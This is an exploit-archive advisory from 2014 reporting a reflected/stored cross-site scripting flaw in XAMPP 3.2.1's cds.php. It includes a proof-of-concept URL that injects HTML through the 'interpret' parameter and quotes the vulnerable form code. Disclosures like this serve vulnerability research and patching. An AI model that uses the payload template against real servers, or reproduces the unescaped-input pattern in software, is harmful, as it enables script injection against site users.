XAMPP 3.2.1 Cross Site Scripting

2014.01.16

Credit: DevilScreaM

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Title : XAMPP 3.2.1 Cross Site Scripting

#Author : DevilScreaM

#Date : 15 January 2014

#Category : Web Applications

#Vendor : http://sourceforge.net/projects/xampp

#Version : 3.2.1

#Type : PHP

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows

#Vulnerabillity : Cross Site Scripting

Cross Site Scripting

Exploit & POC

http://localhost/xampp/cds.php?interpret=[YOUR_XSS]&titel=title&jahr=title

Example

http://localhost/xampp/cds.php?interpret=<h1>DevilScreaM</h1>&titel=title&jahr=title

View Cross Site Scripting at

http://localhost/xampp/cds-fpdf.php

Vulnerabillity at Code

<tr><td><?php print $TEXT['cds-attrib1']; ?>:</td><td><input type=text size=30 name=interpret></td></tr>
<tr><td><?php print $TEXT['cds-attrib2']; ?>:</td><td> <input type=text size=30 name=titel></td></tr>
<tr><td><?php print $TEXT['cds-attrib3']; ?>:</td><td> <input type=text size=5 name=jahr></td></tr>

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

XAMPP 3.2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

XAMPP 3.2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.